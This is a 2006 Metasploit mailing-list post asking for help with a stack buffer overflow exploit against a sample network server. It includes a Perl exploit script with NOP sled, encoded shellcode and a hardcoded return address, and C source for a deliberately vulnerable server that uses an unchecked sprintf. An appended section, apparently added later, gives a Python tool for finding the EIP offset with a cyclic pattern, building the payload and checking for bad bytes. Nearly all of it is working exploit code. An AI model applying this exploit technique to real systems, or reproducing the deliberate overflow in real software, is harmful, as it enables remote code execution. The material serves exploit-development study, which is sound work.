Metasploit mailing list archives

Exploit development issues


From: 0x0804 at gmail.com (curious one)
Date: Tue, 11 Apr 2006 15:43:48 +0400

Hi List,

Getting back on track by disabling VA space randomization, I began with the
vulnerable sample program provided with the SDK. But it is the same story: I get an
error (bad address) and it exits. So in order to keep up my spirits I took the
following program from
http://www.zone-h.org/files/32/remote_exploits.htm and started with the
exploitation process. Strangely, I could not get an
offset by using patternOffset.pl. So I started the trusted method of piping
the evil buffer over nc. I generated the shellcode using Metasploit and I was
relatively successful in that. That is to say, I was able to overwrite EIP
with the correct return address. Now the issue came when the last two bytes of the
shellcode started producing segfaults. Can someone have a look and tell me
where I am going wrong?

The attached screenshot is the result of the above experiment. Note that
control flow fails when it gets to \x47, which is part of my shellcode
generated by Metasploit.

Cheers

---------------------foo-buffer.pl---------------------------------
#!/usr/bin/perl
# We create the buffer and pipe it to nc: perl foo-buffer.pl | nc 127.0.0.1 11221
use strict;
use warnings;

binmode(STDOUT);    # raw bytes out, no newline translation

# NOP sled
my $string = "\x90" x 834;

# 96-byte Metasploit-generated (encoded) shellcode
$string .= "\x2b\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a".
           "\x27\x47\xb1\x83\xeb\xfc\xe2\xf4\xbb\xfc\x14\xf2\xd9\x4d\x45\xdb".
           "\xec\x7f\xce\x50\x47\xa7\xd4\xe8\x3a\x18\x8a\x31\xc3\x5e\xbe\xea".
           "\xd0\x4f\x38\xb1\x8a\x26\x21\xd9\x9a\xc6\x04\xd7\xd9\xae\xa6\x01".
           "\xec\x77\x16\xe2\x03\xc6\x04\x7c\x0a\x75\x2f\x9e\xa5\x54\x2f\xd9".
           "\xa5\x45\x2e\xdf\x03\xc4\x15\xe2\x03\xc6\xf7\xba\x47\xa7\x47\xb1";

# NOP padding up to the saved return address
$string .= "\x90" x 100;

## Return address is 0xbffff536 (little-endian), written twice
$string .= "\x36\xf5\xff\xbf" x 2;

# Trailing byte: the server does name[bytes - 1] = '\0', so the last byte sent is discarded
$string .= "\x00";

print $string;


------------------------vulnerable-program.c---------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    int bytes;

    strcpy(buffer, "My name is: ");
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;

    /* Up to NAME_SIZE bytes are read into name[]. */
    bytes = recv(c, name, sizeof(name), 0);
    if (bytes == -1)
        return -1;

    /* The last byte received is replaced by the terminator. */
    name[bytes - 1] = '\0';

    /* Deliberate stack overflow: name[] can hold up to 2047 bytes, but
     * "Hello " + name + ", nice to meet you!\r\n" is written into the
     * 1024-byte buffer[] with no length check. */
    sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    int s, c;
    struct sockaddr_in srv;

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed");
        return 2;
    }

    memset(&srv, 0, sizeof(srv));
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons((unsigned short int) atol(argv[1]));
    srv.sin_family = AF_INET;

    if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1)
    {
        perror("bind() failed");
        return 3;
    }

    if (listen(s, 3) == -1)
    {
        perror("listen() failed");
        return 4;
    }

    for (;;)
    {
        c = accept(s, NULL, 0);
        if (c == -1)
        {
            perror("accept() failed");
            return 5;
        }
        printf("connection received\n");
        if (handling(c) == -1)
            fprintf(stderr, "%s: handling() failed\n", argv[0]);
        close(c);
    }
    return 0;
}
Attachment: snapshot.png (image/png, 296054 bytes)
<http://mail.metasploit.com/pipermail/framework/attachments/20060411/a09d8b9e/attachment.png>
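As an added example, not code from the post above nor from Metasploit: the two steps the poster is working through, finding the EIP offset with a cyclic pattern (the same Aa0Aa1Aa2... scheme that Metasploit's patternCreate/patternOffset use) and then rebuilding the foo-buffer.pl layout, together with the checks the vulnerable program's handling() imposes on the bytes that are actually sent (one recv() of at most NAME_SIZE bytes, the last byte replaced by '\0', and a sprintf() into the 1024-byte buffer[] whose %s stops at the first NUL). SAMPLE_SHELLCODE, the gdb value 0x41326141 and the sled start 0xbffff400 are constructed stand-ins; the offset 1030 is simply 834 + 96 + 100 from the posted script.

```python
import itertools
import struct

# Layout of the vulnerable program posted above: recv() reads up to NAME_SIZE
# bytes into name[], the last byte received is replaced with '\0', and
# sprintf() then writes "Hello " + name + ", nice to meet you!\r\n" into the
# BUFFER_SIZE-byte buffer[], so byte 0 of what we send lands at buffer[6].
BUFFER_SIZE = 1024
NAME_SIZE = 2048
PREFIX = b"Hello "
SUFFIX = b", nice to meet you!\r\n"

# Constructed stand-in for the post's 96-byte encoded shellcode (int3 breakpoints).
SAMPLE_SHELLCODE = b"\xcc" * 96


def pattern_create(length):
    """Cyclic pattern in the Metasploit patternCreate scheme: Aa0Aa1Aa2...Ab0...
    Any 4-byte substring is unique for the first 20280 bytes."""
    out = bytearray()
    for u, l, d in itertools.product(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
                                     b"abcdefghijklmnopqrstuvwxyz",
                                     b"0123456789"):
        out += bytes((u, l, d))
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value, length=NAME_SIZE):
    """Offset within a pattern of `length` bytes of the bytes seen in EIP.
    `value` is either the raw 4 bytes or the little-endian integer gdb shows
    (0x41326141 for the bytes 'Aa2A').  Returns -1 when not found."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern_create(length).find(value)


def build_payload(shellcode, ret_addr, eip_offset, sled=834, ret_copies=2):
    """Same layout as foo-buffer.pl: NOP sled, shellcode, NOP pad, return address.
    eip_offset is where (within the bytes sent) the saved EIP begins, as found
    with pattern_offset(); the pad is sized so the address lands exactly there."""
    body = b"\x90" * sled + shellcode
    pad = eip_offset - len(body)
    if pad < 0:
        raise ValueError("sled + shellcode overrun the EIP offset")
    payload = body + b"\x90" * pad + struct.pack("<I", ret_addr) * ret_copies
    # handling() does name[bytes - 1] = '\0': the final byte sent is discarded.
    return payload + b"\x00"


def check_payload(payload, ret_addr):
    """Constraints the target imposes on the bytes actually sent; empty list = OK."""
    problems = []
    if len(payload) > NAME_SIZE:
        problems.append("longer than NAME_SIZE: recv() truncates the payload")
    body = payload[:-1]
    if b"\x00" in body:
        problems.append("NUL before the terminator: sprintf's %s stops copying there")
    if not payload or payload[-1] != 0:
        problems.append("last byte is not NUL: the target overwrites it anyway")
    # sprintf writes prefix + name + suffix + its own terminating NUL into buffer[]
    if len(PREFIX) + len(body) + len(SUFFIX) + 1 <= BUFFER_SIZE:
        problems.append("'Hello ' + name fits in buffer[]: nothing overflows")
    if b"\x00" in struct.pack("<I", ret_addr):
        problems.append("return address contains a NUL byte")
    return problems


def sled_covers(ret_addr, sled_start, sled_len):
    """True if ret_addr falls inside the NOP sled that starts at sled_start
    (the sled's address in the copy that will execute, as read from gdb)."""
    return sled_start <= ret_addr < sled_start + sled_len


if __name__ == "__main__":
    # Step 1: send pattern_create(NAME_SIZE), read EIP from gdb, look it up.
    print("EIP offset for 0x41326141:", pattern_offset(0x41326141))
    # Step 2: rebuild the post's buffer; 834 + 96 + 100 puts EIP at offset 1030.
    p = build_payload(SAMPLE_SHELLCODE, 0xbffff536, eip_offset=1030)
    print(len(p), "bytes;", check_payload(p, 0xbffff536) or "no problems found")
    # Step 3: does the return address land in the sled?  0xbffff400 is an
    # assumed address for buffer+6 as it would be read from gdb, not from the post.
    print("sled covers ret:", sled_covers(0xbffff536, 0xbffff400, 834))
```

To send the result the way the post does, write the bytes to stdout in binary mode and pipe them to nc; the checks are worth running before every send, because a single NUL in the encoded shellcode or in the return address silently truncates what sprintf() copies into buffer[].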
